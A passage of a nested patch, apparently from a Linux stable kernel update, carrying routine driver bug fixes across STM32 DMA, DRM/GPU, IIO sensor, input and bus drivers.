+ 	residue = stm32_dma_get_remaining_bytes(chan);
+ 
+-	if (chan->desc->cyclic && !stm32_dma_is_current_sg(chan)) {
++	if ((chan->desc->cyclic || chan->trig_mdma) && !stm32_dma_is_current_sg(chan)) {
+ 		n_sg++;
+ 		if (n_sg == chan->desc->num_sgs)
+ 			n_sg = 0;
+-		residue = sg_req->len;
++		if (!chan->trig_mdma)
++			residue = sg_req->len;
+ 	}
+ 
+ 	/*
+@@ -1401,7 +1404,7 @@ static size_t stm32_dma_desc_residue(struct stm32_dma_chan *chan,
+ 	 * residue = remaining bytes from NDTR + remaining
+ 	 * periods/sg to be transferred
+ 	 */
+-	if (!chan->desc->cyclic || n_sg != 0)
++	if ((!chan->desc->cyclic && !chan->trig_mdma) || n_sg != 0)
+ 		for (i = n_sg; i < desc->num_sgs; i++)
+ 			residue += desc->sg_req[i].len;
+ 
+diff --git a/drivers/dma/stm32-mdma.c b/drivers/dma/stm32-mdma.c
+index b9d4c843635fc..4e9bab61f4663 100644
+--- a/drivers/dma/stm32-mdma.c
++++ b/drivers/dma/stm32-mdma.c
+@@ -778,8 +778,6 @@ static int stm32_mdma_setup_xfer(struct stm32_mdma_chan *chan,
+ 	/* Enable interrupts */
+ 	ccr &= ~STM32_MDMA_CCR_IRQ_MASK;
+ 	ccr |= STM32_MDMA_CCR_TEIE | STM32_MDMA_CCR_CTCIE;
+-	if (sg_len > 1)
+-		ccr |= STM32_MDMA_CCR_BTIE;
+ 	desc->ccr = ccr;
+ 
+ 	return 0;
+@@ -1237,6 +1235,10 @@ static int stm32_mdma_resume(struct dma_chan *c)
+ 	unsigned long flags;
+ 	u32 status, reg;
+ 
++	/* Transfer can be terminated */
++	if (!chan->desc || (stm32_mdma_read(dmadev, STM32_MDMA_CCR(chan->id)) & STM32_MDMA_CCR_EN))
++		return -EPERM;
++
+ 	hwdesc = chan->desc->node[chan->curr_hwdesc].hwdesc;
+ 
+ 	spin_lock_irqsave(&chan->vchan.lock, flags);
+@@ -1317,21 +1319,35 @@ static int stm32_mdma_slave_config(struct dma_chan *c,
+ 
+ static size_t stm32_mdma_desc_residue(struct stm32_mdma_chan *chan,
+ 				      struct stm32_mdma_desc *desc,
+-				      u32 curr_hwdesc)
++				      u32 curr_hwdesc,
++				      struct dma_tx_state *state)
+ {
+ 	struct stm32_mdma_device *dmadev = stm32_mdma_get_dev(chan);
+ 	struct stm32_mdma_hwdesc *hwdesc;
+-	u32 cbndtr, residue, modulo, burst_size;
++	u32 cisr, clar, cbndtr, residue, modulo, burst_size;
+ 	int i;
+ 
++	cisr = stm32_mdma_read(dmadev, STM32_MDMA_CISR(chan->id));
++
+ 	residue = 0;
+-	for (i = curr_hwdesc + 1; i < desc->count; i++) {
++	/* Get the next hw descriptor to process from current transfer */
++	clar = stm32_mdma_read(dmadev, STM32_MDMA_CLAR(chan->id));
++	for (i = desc->count - 1; i >= 0; i--) {
+ 		hwdesc = desc->node[i].hwdesc;
++
++		if (hwdesc->clar == clar)
++			break;/* Current transfer found, stop cumulating */
++
++		/* Cumulate residue of unprocessed hw descriptors */
+ 		residue += STM32_MDMA_CBNDTR_BNDT(hwdesc->cbndtr);
+ 	}
+ 	cbndtr = stm32_mdma_read(dmadev, STM32_MDMA_CBNDTR(chan->id));
+ 	residue += cbndtr & STM32_MDMA_CBNDTR_BNDT_MASK;
+ 
++	state->in_flight_bytes = 0;
++	if (chan->chan_config.m2m_hw && (cisr & STM32_MDMA_CISR_CRQA))
++		state->in_flight_bytes = cbndtr & STM32_MDMA_CBNDTR_BNDT_MASK;
++
+ 	if (!chan->mem_burst)
+ 		return residue;
+ 
+@@ -1361,11 +1377,10 @@ static enum dma_status stm32_mdma_tx_status(struct dma_chan *c,
+ 
+ 	vdesc = vchan_find_desc(&chan->vchan, cookie);
+ 	if (chan->desc && cookie == chan->desc->vdesc.tx.cookie)
+-		residue = stm32_mdma_desc_residue(chan, chan->desc,
+-						  chan->curr_hwdesc);
++		residue = stm32_mdma_desc_residue(chan, chan->desc, chan->curr_hwdesc, state);
+ 	else if (vdesc)
+-		residue = stm32_mdma_desc_residue(chan,
+-						  to_stm32_mdma_desc(vdesc), 0);
++		residue = stm32_mdma_desc_residue(chan, to_stm32_mdma_desc(vdesc), 0, state);
++
+ 	dma_set_residue(state, residue);
+ 
+ 	spin_unlock_irqrestore(&chan->vchan.lock, flags);
+diff --git a/drivers/gpu/drm/amd/amdgpu/amdgpu_object.h b/drivers/gpu/drm/amd/amdgpu/amdgpu_object.h
+index 93207badf83f3..6dcd7bab42fbb 100644
+--- a/drivers/gpu/drm/amd/amdgpu/amdgpu_object.h
++++ b/drivers/gpu/drm/amd/amdgpu/amdgpu_object.h
+@@ -220,7 +220,7 @@ static inline bool amdgpu_bo_in_cpu_visible_vram(struct amdgpu_bo *bo)
+ 	struct amdgpu_device *adev = amdgpu_ttm_adev(bo->tbo.bdev);
+ 	struct amdgpu_res_cursor cursor;
+ 
+-	if (bo->tbo.resource->mem_type != TTM_PL_VRAM)
++	if (!bo->tbo.resource || bo->tbo.resource->mem_type != TTM_PL_VRAM)
+ 		return false;
+ 
+ 	amdgpu_res_first(bo->tbo.resource, 0, amdgpu_bo_size(bo), &cursor);
+diff --git a/drivers/gpu/drm/amd/display/dc/core/dc.c b/drivers/gpu/drm/amd/display/dc/core/dc.c
+index 16c05a24ac7aa..15d3caf3d6d72 100644
+--- a/drivers/gpu/drm/amd/display/dc/core/dc.c
++++ b/drivers/gpu/drm/amd/display/dc/core/dc.c
+@@ -1183,6 +1183,9 @@ static void disable_vbios_mode_if_required(
+ 		if (stream == NULL)
+ 			continue;
+ 
++		if (stream->apply_seamless_boot_optimization)
++			continue;
++
+ 		// only looking for first odm pipe
+ 		if (pipe->prev_odm_pipe)
+ 			continue;
+diff --git a/drivers/gpu/drm/drm_atomic_helper.c b/drivers/gpu/drm/drm_atomic_helper.c
+index 202a9990f4517..b097bff1cd18e 100644
+--- a/drivers/gpu/drm/drm_atomic_helper.c
++++ b/drivers/gpu/drm/drm_atomic_helper.c
+@@ -290,7 +290,8 @@ static int
+ update_connector_routing(struct drm_atomic_state *state,
+ 			 struct drm_connector *connector,
+ 			 struct drm_connector_state *old_connector_state,
+-			 struct drm_connector_state *new_connector_state)
++			 struct drm_connector_state *new_connector_state,
++			 bool added_by_user)
+ {
+ 	const struct drm_connector_helper_funcs *funcs;
+ 	struct drm_encoder *new_encoder;
+@@ -339,9 +340,13 @@ update_connector_routing(struct drm_atomic_state *state,
+ 	 * there's a chance the connector may have been destroyed during the
+ 	 * process, but it's better to ignore that then cause
+ 	 * drm_atomic_helper_resume() to fail.
++	 *
++	 * Last, we want to ignore connector registration when the connector
++	 * was not pulled in the atomic state by user-space (ie, was pulled
++	 * in by the driver, e.g. when updating a DP-MST stream).
+ 	 */
+ 	if (!state->duplicated && drm_connector_is_unregistered(connector) &&
+-	    crtc_state->active) {
++	    added_by_user && crtc_state->active) {
+ 		drm_dbg_atomic(connector->dev,
+ 			       "[CONNECTOR:%d:%s] is not registered\n",
+ 			       connector->base.id, connector->name);
+@@ -620,7 +625,10 @@ drm_atomic_helper_check_modeset(struct drm_device *dev,
+ 	struct drm_connector *connector;
+ 	struct drm_connector_state *old_connector_state, *new_connector_state;
+ 	int i, ret;
+-	unsigned int connectors_mask = 0;
++	unsigned int connectors_mask = 0, user_connectors_mask = 0;
++
++	for_each_oldnew_connector_in_state(state, connector, old_connector_state, new_connector_state, i)
++		user_connectors_mask |= BIT(i);
+ 
+ 	for_each_oldnew_crtc_in_state(state, crtc, old_crtc_state, new_crtc_state, i) {
+ 		bool has_connectors =
+@@ -685,7 +693,8 @@ drm_atomic_helper_check_modeset(struct drm_device *dev,
+ 		 */
+ 		ret = update_connector_routing(state, connector,
+ 					       old_connector_state,
+-					       new_connector_state);
++					       new_connector_state,
++					       BIT(i) & user_connectors_mask);
+ 		if (ret)
+ 			return ret;
+ 		if (old_connector_state->crtc) {
+diff --git a/drivers/gpu/drm/i915/gt/gen8_engine_cs.c b/drivers/gpu/drm/i915/gt/gen8_engine_cs.c
+index cc84685368715..efc22f9b17f07 100644
+--- a/drivers/gpu/drm/i915/gt/gen8_engine_cs.c
++++ b/drivers/gpu/drm/i915/gt/gen8_engine_cs.c
+@@ -235,8 +235,17 @@ int gen12_emit_flush_rcs(struct i915_request *rq, u32 mode)
+ 		u32 flags = 0;
+ 		u32 *cs;
+ 
++		/*
++		 * L3 fabric flush is needed for AUX CCS invalidation
++		 * which happens as part of pipe-control so we can
++		 * ignore PIPE_CONTROL_FLUSH_L3. Also PIPE_CONTROL_FLUSH_L3
++		 * deals with Protected Memory which is not needed for
++		 * AUX CCS invalidation and lead to unwanted side effects.
++		 */
++		if (mode & EMIT_FLUSH)
++			flags |= PIPE_CONTROL_FLUSH_L3;
++
+ 		flags |= PIPE_CONTROL_TILE_CACHE_FLUSH;
+-		flags |= PIPE_CONTROL_FLUSH_L3;
+ 		flags |= PIPE_CONTROL_RENDER_TARGET_CACHE_FLUSH;
+ 		flags |= PIPE_CONTROL_DEPTH_CACHE_FLUSH;
+ 		/* Wa_1409600907:tgl,adl-p */
+diff --git a/drivers/gpu/drm/msm/disp/dpu1/dpu_plane.c b/drivers/gpu/drm/msm/disp/dpu1/dpu_plane.c
+index 3fbda2a1f77fc..62d48c0f905e4 100644
+--- a/drivers/gpu/drm/msm/disp/dpu1/dpu_plane.c
++++ b/drivers/gpu/drm/msm/disp/dpu1/dpu_plane.c
+@@ -142,6 +142,7 @@ static void _dpu_plane_calc_bw(struct drm_plane *plane,
+ 	const struct dpu_format *fmt = NULL;
+ 	struct dpu_kms *dpu_kms = _dpu_plane_get_kms(plane);
+ 	int src_width, src_height, dst_height, fps;
++	u64 plane_pixel_rate, plane_bit_rate;
+ 	u64 plane_prefill_bw;
+ 	u64 plane_bw;
+ 	u32 hw_latency_lines;
+@@ -164,13 +165,12 @@ static void _dpu_plane_calc_bw(struct drm_plane *plane,
+ 	scale_factor = src_height > dst_height ?
+ 		mult_frac(src_height, 1, dst_height) : 1;
+ 
+-	plane_bw =
+-		src_width * mode->vtotal * fps * fmt->bpp *
+-		scale_factor;
++	plane_pixel_rate = src_width * mode->vtotal * fps;
++	plane_bit_rate = plane_pixel_rate * fmt->bpp;
+ 
+-	plane_prefill_bw =
+-		src_width * hw_latency_lines * fps * fmt->bpp *
+-		scale_factor * mode->vtotal;
++	plane_bw = plane_bit_rate * scale_factor;
++
++	plane_prefill_bw = plane_bw * hw_latency_lines;
+ 
+ 	if ((vbp+vpw) > hw_latency_lines)
+ 		do_div(plane_prefill_bw, (vbp+vpw));
+diff --git a/drivers/gpu/drm/msm/dp/dp_ctrl.c b/drivers/gpu/drm/msm/dp/dp_ctrl.c
+index dd26ca651a054..103eef9f059a0 100644
+--- a/drivers/gpu/drm/msm/dp/dp_ctrl.c
++++ b/drivers/gpu/drm/msm/dp/dp_ctrl.c
+@@ -1711,13 +1711,6 @@ int dp_ctrl_on_link(struct dp_ctrl *dp_ctrl)
+ 		return rc;
+ 
+ 	while (--link_train_max_retries) {
+-		rc = dp_ctrl_reinitialize_mainlink(ctrl);
+-		if (rc) {
+-			DRM_ERROR("Failed to reinitialize mainlink. rc=%d\n",
+-					rc);
+-			break;
+-		}
+-
+ 		training_step = DP_TRAINING_NONE;
+ 		rc = dp_ctrl_setup_main_link(ctrl, &training_step);
+ 		if (rc == 0) {
+@@ -1769,6 +1762,12 @@ int dp_ctrl_on_link(struct dp_ctrl *dp_ctrl)
+ 			/* stop link training before start re training  */
+ 			dp_ctrl_clear_training_pattern(ctrl);
+ 		}
++
++		rc = dp_ctrl_reinitialize_mainlink(ctrl);
++		if (rc) {
++			DRM_ERROR("Failed to reinitialize mainlink. rc=%d\n", rc);
++			break;
++		}
+ 	}
+ 
+ 	if (ctrl->link->sink_request & DP_TEST_LINK_PHY_TEST_PATTERN)
+diff --git a/drivers/gpu/drm/msm/dp/dp_link.c b/drivers/gpu/drm/msm/dp/dp_link.c
+index 36bb6191d2f03..cb66d1126ea96 100644
+--- a/drivers/gpu/drm/msm/dp/dp_link.c
++++ b/drivers/gpu/drm/msm/dp/dp_link.c
+@@ -1068,7 +1068,7 @@ int dp_link_process_request(struct dp_link *dp_link)
+ 		}
+ 	}
+ 
+-	drm_dbg_dp(link->drm_dev, "sink request=%#x",
++	drm_dbg_dp(link->drm_dev, "sink request=%#x\n",
+ 				dp_link->sink_request);
+ 	return ret;
+ }
+diff --git a/drivers/gpu/drm/msm/dsi/dsi_host.c b/drivers/gpu/drm/msm/dsi/dsi_host.c
+index b433ccfe4d7da..e20cd3dd2c6cc 100644
+--- a/drivers/gpu/drm/msm/dsi/dsi_host.c
++++ b/drivers/gpu/drm/msm/dsi/dsi_host.c
+@@ -1098,9 +1098,21 @@ static void dsi_wait4video_done(struct msm_dsi_host *msm_host)
+ 
+ static void dsi_wait4video_eng_busy(struct msm_dsi_host *msm_host)
+ {
++	u32 data;
++
+ 	if (!(msm_host->mode_flags & MIPI_DSI_MODE_VIDEO))
+ 		return;
+ 
++	data = dsi_read(msm_host, REG_DSI_STATUS0);
++
++	/* if video mode engine is not busy, its because
++	 * either timing engine was not turned on or the
++	 * DSI controller has finished transmitting the video
++	 * data already, so no need to wait in those cases
++	 */
++	if (!(data & DSI_STATUS0_VIDEO_MODE_ENGINE_BUSY))
++		return;
++
+ 	if (msm_host->power_on && msm_host->enabled) {
+ 		dsi_wait4video_done(msm_host);
+ 		/* delay 4 ms to skip BLLP */
+@@ -1960,10 +1972,9 @@ int msm_dsi_host_init(struct msm_dsi *msm_dsi)
+ 	}
+ 
+ 	msm_host->irq = irq_of_parse_and_map(pdev->dev.of_node, 0);
+-	if (msm_host->irq < 0) {
+-		ret = msm_host->irq;
+-		dev_err(&pdev->dev, "failed to get irq: %d\n", ret);
+-		return ret;
++	if (!msm_host->irq) {
++		dev_err(&pdev->dev, "failed to get irq\n");
++		return -EINVAL;
+ 	}
+ 
+ 	/* do not autoenable, will be enabled later */
+diff --git a/drivers/gpu/drm/scheduler/sched_main.c b/drivers/gpu/drm/scheduler/sched_main.c
+index e5a4ecde0063d..f138b3be1646f 100644
+--- a/drivers/gpu/drm/scheduler/sched_main.c
++++ b/drivers/gpu/drm/scheduler/sched_main.c
+@@ -841,7 +841,7 @@ drm_sched_get_cleanup_job(struct drm_gpu_scheduler *sched)
+ 
+ 		if (next) {
+ 			next->s_fence->scheduled.timestamp =
+-				job->s_fence->finished.timestamp;
++				dma_fence_timestamp(&job->s_fence->finished);
+ 			/* start TO timer for next job */
+ 			drm_sched_start_timeout(sched);
+ 		}
+diff --git a/drivers/gpu/drm/vmwgfx/vmwgfx_execbuf.c b/drivers/gpu/drm/vmwgfx/vmwgfx_execbuf.c
+index 58ca9adf09871..7e59469e1cb9f 100644
+--- a/drivers/gpu/drm/vmwgfx/vmwgfx_execbuf.c
++++ b/drivers/gpu/drm/vmwgfx/vmwgfx_execbuf.c
+@@ -1614,7 +1614,7 @@ static int vmw_cmd_tex_state(struct vmw_private *dev_priv,
+ {
+ 	VMW_DECLARE_CMD_VAR(*cmd, SVGA3dCmdSetTextureState);
+ 	SVGA3dTextureState *last_state = (SVGA3dTextureState *)
+-	  ((unsigned long) header + header->size + sizeof(header));
++	  ((unsigned long) header + header->size + sizeof(*header));
+ 	SVGA3dTextureState *cur_state = (SVGA3dTextureState *)
+ 		((unsigned long) header + sizeof(*cmd));
+ 	struct vmw_resource *ctx;
+diff --git a/drivers/hid/hid-logitech-hidpp.c b/drivers/hid/hid-logitech-hidpp.c
+index 97eefb77f6014..fb427391c3b86 100644
+--- a/drivers/hid/hid-logitech-hidpp.c
++++ b/drivers/hid/hid-logitech-hidpp.c
+@@ -4275,7 +4275,8 @@ static int hidpp_probe(struct hid_device *hdev, const struct hid_device_id *id)
+ 			goto hid_hw_init_fail;
+ 	}
+ 
+-	hidpp_connect_event(hidpp);
++	schedule_work(&hidpp->work);
++	flush_work(&hidpp->work);
+ 
+ 	if (will_restart) {
+ 		/* Reset the HID node state */
+diff --git a/drivers/iio/adc/imx8qxp-adc.c b/drivers/iio/adc/imx8qxp-adc.c
+index f5a0fc9e64c54..fff6e5a2d9569 100644
+--- a/drivers/iio/adc/imx8qxp-adc.c
++++ b/drivers/iio/adc/imx8qxp-adc.c
+@@ -38,8 +38,8 @@
+ #define IMX8QXP_ADR_ADC_FCTRL		0x30
+ #define IMX8QXP_ADR_ADC_SWTRIG		0x34
+ #define IMX8QXP_ADR_ADC_TCTRL(tid)	(0xc0 + (tid) * 4)
+-#define IMX8QXP_ADR_ADC_CMDH(cid)	(0x100 + (cid) * 8)
+-#define IMX8QXP_ADR_ADC_CMDL(cid)	(0x104 + (cid) * 8)
++#define IMX8QXP_ADR_ADC_CMDL(cid)	(0x100 + (cid) * 8)
++#define IMX8QXP_ADR_ADC_CMDH(cid)	(0x104 + (cid) * 8)
+ #define IMX8QXP_ADR_ADC_RESFIFO		0x300
+ #define IMX8QXP_ADR_ADC_TST		0xffc
+ 
+diff --git a/drivers/iio/addac/Kconfig b/drivers/iio/addac/Kconfig
+index fcf6d2269bfc2..3507cd6ab4e54 100644
+--- a/drivers/iio/addac/Kconfig
++++ b/drivers/iio/addac/Kconfig
+@@ -10,6 +10,8 @@ config AD74413R
+ 	depends on GPIOLIB && SPI
+ 	select REGMAP_SPI
+ 	select CRC8
++	select IIO_BUFFER
++	select IIO_TRIGGERED_BUFFER
+ 	help
+ 	  Say yes here to build support for Analog Devices AD74412R/AD74413R
+ 	  quad-channel software configurable input/output solution.
+diff --git a/drivers/iio/dac/ad3552r.c b/drivers/iio/dac/ad3552r.c
+index d5ea1a1be1226..a492e8f2fc0fb 100644
+--- a/drivers/iio/dac/ad3552r.c
++++ b/drivers/iio/dac/ad3552r.c
+@@ -140,8 +140,8 @@ enum ad3552r_ch_vref_select {
+ };
+ 
+ enum ad3542r_id {
+-	AD3542R_ID = 0x4008,
+-	AD3552R_ID = 0x4009,
++	AD3542R_ID = 0x4009,
++	AD3552R_ID = 0x4008,
+ };
+ 
+ enum ad3552r_ch_output_range {
+diff --git a/drivers/iio/frequency/admv1013.c b/drivers/iio/frequency/admv1013.c
+index e6311213f3e89..d15b85377159b 100644
+--- a/drivers/iio/frequency/admv1013.c
++++ b/drivers/iio/frequency/admv1013.c
+@@ -351,9 +351,9 @@ static int admv1013_update_mixer_vgate(struct admv1013_state *st)
+ 	if (vcm < 0)
+ 		return vcm;
+ 
+-	if (vcm < 1800000)
++	if (vcm <= 1800000)
+ 		mixer_vgate = (2389 * vcm / 1000000 + 8100) / 100;
+-	else if (vcm > 1800000 && vcm < 2600000)
++	else if (vcm > 1800000 && vcm <= 2600000)
+ 		mixer_vgate = (2375 * vcm / 1000000 + 125) / 100;
+ 	else
+ 		return -EINVAL;
+diff --git a/drivers/iio/imu/bno055/Kconfig b/drivers/iio/imu/bno055/Kconfig
+index fa79b1ac4f85b..83e53acfbe880 100644
+--- a/drivers/iio/imu/bno055/Kconfig
++++ b/drivers/iio/imu/bno055/Kconfig
+@@ -2,6 +2,8 @@
+ 
+ config BOSCH_BNO055
+ 	tristate
++	select IIO_BUFFER
++	select IIO_TRIGGERED_BUFFER
+ 
+ config BOSCH_BNO055_SERIAL
+ 	tristate "Bosch BNO055 attached via UART"
+diff --git a/drivers/iio/pressure/bmp280-core.c b/drivers/iio/pressure/bmp280-core.c
+index c0aff78489b46..4c867157aa968 100644
+--- a/drivers/iio/pressure/bmp280-core.c
++++ b/drivers/iio/pressure/bmp280-core.c
+@@ -1786,7 +1786,7 @@ int bmp280_common_probe(struct device *dev,
+ 	 * however as it happens, the BMP085 shares the chip ID of BMP180
+ 	 * so we look for an IRQ if we have that.
+ 	 */
+-	if (irq > 0 || (chip_id  == BMP180_CHIP_ID)) {
++	if (irq > 0 && (chip_id  == BMP180_CHIP_ID)) {
+ 		ret = bmp085_fetch_eoc_irq(dev, name, irq, data);
+ 		if (ret)
+ 			return ret;
+diff --git a/drivers/iio/pressure/dps310.c b/drivers/iio/pressure/dps310.c
+index 984a3f511a1ae..db1b1e48225aa 100644
+--- a/drivers/iio/pressure/dps310.c
++++ b/drivers/iio/pressure/dps310.c
+@@ -57,8 +57,8 @@
+ #define  DPS310_RESET_MAGIC	0x09
+ #define DPS310_COEF_BASE	0x10
+ 
+-/* Make sure sleep time is <= 20ms for usleep_range */
+-#define DPS310_POLL_SLEEP_US(t)		min(20000, (t) / 8)
++/* Make sure sleep time is <= 30ms for usleep_range */
++#define DPS310_POLL_SLEEP_US(t)		min(30000, (t) / 8)
+ /* Silently handle error in rate value here */
+ #define DPS310_POLL_TIMEOUT_US(rc)	((rc) <= 0 ? 1000000 : 1000000 / (rc))
+ 
+@@ -402,8 +402,8 @@ static int dps310_reset_wait(struct dps310_data *data)
+ 	if (rc)
+ 		return rc;
+ 
+-	/* Wait for device chip access: 2.5ms in specification */
+-	usleep_range(2500, 12000);
++	/* Wait for device chip access: 15ms in specification */
++	usleep_range(15000, 55000);
+ 	return 0;
+ }
+ 
+diff --git a/drivers/iio/pressure/ms5611_core.c b/drivers/iio/pressure/ms5611_core.c
+index c564a1d6cafe8..44cfdbedcfaab 100644
+--- a/drivers/iio/pressure/ms5611_core.c
++++ b/drivers/iio/pressure/ms5611_core.c
+@@ -76,7 +76,7 @@ static bool ms5611_prom_is_valid(u16 *prom, size_t len)
+ 
+ 	crc = (crc >> 12) & 0x000F;
+ 
+-	return crc_orig != 0x0000 && crc == crc_orig;
++	return crc == crc_orig;
+ }
+ 
+ static int ms5611_read_prom(struct iio_dev *indio_dev)
+diff --git a/drivers/infiniband/hw/cxgb4/cm.c b/drivers/infiniband/hw/cxgb4/cm.c
+index ced615b5ea096..040ba2224f9ff 100644
+--- a/drivers/infiniband/hw/cxgb4/cm.c
++++ b/drivers/infiniband/hw/cxgb4/cm.c
+@@ -1965,6 +1965,9 @@ static int send_fw_act_open_req(struct c4iw_ep *ep, unsigned int atid)
+ 	int win;
+ 
+ 	skb = get_skb(NULL, sizeof(*req), GFP_KERNEL);
++	if (!skb)
++		return -ENOMEM;
++
+ 	req = __skb_put_zero(skb, sizeof(*req));
+ 	req->op_compl = htonl(WR_OP_V(FW_OFLD_CONNECTION_WR));
+ 	req->len16_pkd = htonl(FW_WR_LEN16_V(DIV_ROUND_UP(sizeof(*req), 16)));
+diff --git a/drivers/input/joystick/xpad.c b/drivers/input/joystick/xpad.c
+index 76cbcca13c9e9..c19a4d2023805 100644
+--- a/drivers/input/joystick/xpad.c
++++ b/drivers/input/joystick/xpad.c
+@@ -272,6 +272,7 @@ static const struct xpad_device {
+ 	{ 0x1038, 0x1430, "SteelSeries Stratus Duo", 0, XTYPE_XBOX360 },
+ 	{ 0x1038, 0x1431, "SteelSeries Stratus Duo", 0, XTYPE_XBOX360 },
+ 	{ 0x11c9, 0x55f0, "Nacon GC-100XF", 0, XTYPE_XBOX360 },
++	{ 0x11ff, 0x0511, "PXN V900", 0, XTYPE_XBOX360 },
+ 	{ 0x1209, 0x2882, "Ardwiino Controller", 0, XTYPE_XBOX360 },
+ 	{ 0x12ab, 0x0004, "Honey Bee Xbox360 dancepad", MAP_DPAD_TO_BUTTONS, XTYPE_XBOX360 },
+ 	{ 0x12ab, 0x0301, "PDP AFTERGLOW AX.1", 0, XTYPE_XBOX360 },
+@@ -474,6 +475,7 @@ static const struct usb_device_id xpad_table[] = {
+ 	XPAD_XBOXONE_VENDOR(0x0f0d),		/* Hori Controllers */
+ 	XPAD_XBOX360_VENDOR(0x1038),		/* SteelSeries Controllers */
+ 	XPAD_XBOX360_VENDOR(0x11c9),		/* Nacon GC100XF */
++	XPAD_XBOX360_VENDOR(0x11ff),		/* PXN V900 */
+ 	XPAD_XBOX360_VENDOR(0x1209),		/* Ardwiino Controllers */
+ 	XPAD_XBOX360_VENDOR(0x12ab),		/* X-Box 360 dance pads */
+ 	XPAD_XBOX360_VENDOR(0x1430),		/* RedOctane X-Box 360 controllers */
+diff --git a/drivers/input/misc/powermate.c b/drivers/input/misc/powermate.c
+index c1c733a9cb890..db2ba89adaefa 100644
+--- a/drivers/input/misc/powermate.c
++++ b/drivers/input/misc/powermate.c
+@@ -425,6 +425,7 @@ static void powermate_disconnect(struct usb_interface *intf)
+ 		pm->requires_update = 0;
+ 		usb_kill_urb(pm->irq);
+ 		input_unregister_device(pm->input);
++		usb_kill_urb(pm->config);
+ 		usb_free_urb(pm->irq);
+ 		usb_free_urb(pm->config);
+ 		powermate_free_buffers(interface_to_usbdev(intf), pm);
+diff --git a/drivers/input/mouse/elantech.c b/drivers/input/mouse/elantech.c
+index 2118b2075f437..4e38229404b4b 100644
+--- a/drivers/input/mouse/elantech.c
++++ b/drivers/input/mouse/elantech.c
+@@ -2114,6 +2114,7 @@ static int elantech_setup_ps2(struct psmouse *psmouse,
+ 	psmouse->protocol_handler = elantech_process_byte;
+ 	psmouse->disconnect = elantech_disconnect;
+ 	psmouse->reconnect = elantech_reconnect;
++	psmouse->fast_reconnect = NULL;
+ 	psmouse->pktsize = info->hw_version > 1 ? 6 : 4;
+ 
+ 	return 0;
+diff --git a/drivers/input/mouse/synaptics.c b/drivers/input/mouse/synaptics.c
+index fa021af8506e4..d2c9f4cbd00c6 100644
+--- a/drivers/input/mouse/synaptics.c
++++ b/drivers/input/mouse/synaptics.c
+@@ -1623,6 +1623,7 @@ static int synaptics_init_ps2(struct psmouse *psmouse,
+ 	psmouse->set_rate = synaptics_set_rate;
+ 	psmouse->disconnect = synaptics_disconnect;
+ 	psmouse->reconnect = synaptics_reconnect;
++	psmouse->fast_reconnect = NULL;
+ 	psmouse->cleanup = synaptics_reset;
+ 	/* Synaptics can usually stay in sync without extra help */
+ 	psmouse->resync_time = 0;
+diff --git a/drivers/input/serio/i8042-acpipnpio.h b/drivers/input/serio/i8042-acpipnpio.h
+index 1724d6cb8649d..9c39553d30fa2 100644
+--- a/drivers/input/serio/i8042-acpipnpio.h
++++ b/drivers/input/serio/i8042-acpipnpio.h
+@@ -618,6 +618,14 @@ static const struct dmi_system_id i8042_dmi_quirk_table[] __initconst = {
+ 		},
+ 		.driver_data = (void *)(SERIO_QUIRK_NOMUX)
+ 	},
++	{
++		/* Fujitsu Lifebook E5411 */
++		.matches = {
++			DMI_MATCH(DMI_SYS_VENDOR, "FUJITSU CLIENT COMPUTING LIMITED"),
++			DMI_MATCH(DMI_PRODUCT_NAME, "LIFEBOOK E5411"),
++		},
++		.driver_data = (void *)(SERIO_QUIRK_NOAUX)
++	},
+ 	{
+ 		/* Gigabyte M912 */
+ 		.matches = {
+diff --git a/drivers/input/touchscreen/goodix.c b/drivers/input/touchscreen/goodix.c
+index 25e575183dd18..3f0732db7bf5b 100644
+--- a/drivers/input/touchscreen/goodix.c
++++ b/drivers/input/touchscreen/goodix.c
+@@ -900,6 +900,25 @@ static int goodix_add_acpi_gpio_mappings(struct goodix_ts_data *ts)
+ 		dev_info(dev, "No ACPI GpioInt resource, assuming that the GPIO order is reset, int\n");
+ 		ts->irq_pin_access_method = IRQ_PIN_ACCESS_ACPI_GPIO;
+ 		gpio_mapping = acpi_goodix_int_last_gpios;
++	} else if (ts->gpio_count == 1 && ts->gpio_int_idx == 0) {
++		/*
++		 * On newer devices there is only 1 GpioInt resource and _PS0
++		 * does the whole reset sequence for us.
++		 */
++		acpi_device_fix_up_power(ACPI_COMPANION(dev));
++
++		/*
++		 * Before the _PS0 call the int GPIO may have been in output
++		 * mode and the call should have put the int GPIO in input mode,
++		 * but the GPIO subsys cached state may still think it is
++		 * in output mode, causing gpiochip_lock_as_irq() failure.
++		 *
++		 * Add a mapping for the int GPIO to make the
++		 * gpiod_int = gpiod_get(..., GPIOD_IN) call succeed,
++		 * which will explicitly set the direction to input.
++		 */
++		ts->irq_pin_access_method = IRQ_PIN_ACCESS_NONE;
++		gpio_mapping = acpi_goodix_int_first_gpios;
+ 	} else {
+ 		dev_warn(dev, "Unexpected ACPI resources: gpio_count %d, gpio_int_idx %d\n",
+ 			 ts->gpio_count, ts->gpio_int_idx);
+diff --git a/drivers/irqchip/irq-renesas-rzg2l.c b/drivers/irqchip/irq-renesas-rzg2l.c
+index 25fd8ee66565b..10c3e85c90c23 100644
+--- a/drivers/irqchip/irq-renesas-rzg2l.c
++++ b/drivers/irqchip/irq-renesas-rzg2l.c
+@@ -118,7 +118,7 @@ static void rzg2l_irqc_irq_disable(struct irq_data *d)
+ 
+ 		raw_spin_lock(&priv->lock);
+ 		reg = readl_relaxed(priv->base + TSSR(tssr_index));
+-		reg &= ~(TSSEL_MASK << tssr_offset);
++		reg &= ~(TSSEL_MASK << TSSEL_SHIFT(tssr_offset));
+ 		writel_relaxed(reg, priv->base + TSSR(tssr_index));
+ 		raw_spin_unlock(&priv->lock);
+ 	}
+diff --git a/drivers/mcb/mcb-core.c b/drivers/mcb/mcb-core.c
+index b8ad4f16b4acd..e7b6989d8b4a8 100644
+--- a/drivers/mcb/mcb-core.c
++++ b/drivers/mcb/mcb-core.c
+@@ -387,17 +387,13 @@ EXPORT_SYMBOL_NS_GPL(mcb_free_dev, MCB);
+ 
+ static int __mcb_bus_add_devices(struct device *dev, void *data)
+ {
+-	struct mcb_device *mdev = to_mcb_device(dev);
+ 	int retval;
+ 
+-	if (mdev->is_added)
+-		return 0;
+-
+ 	retval = device_attach(dev);
+-	if (retval < 0)
++	if (retval < 0) {
+ 		dev_err(dev, "Error adding device (%d)\n", retval);
+-
+-	mdev->is_added = true;
++		return retval;
++	}
+ 
+ 	return 0;
+ }
+diff --git a/drivers/mcb/mcb-parse.c b/drivers/mcb/mcb-parse.c
+index aa6938da0db85..c41cbacc75a2c 100644
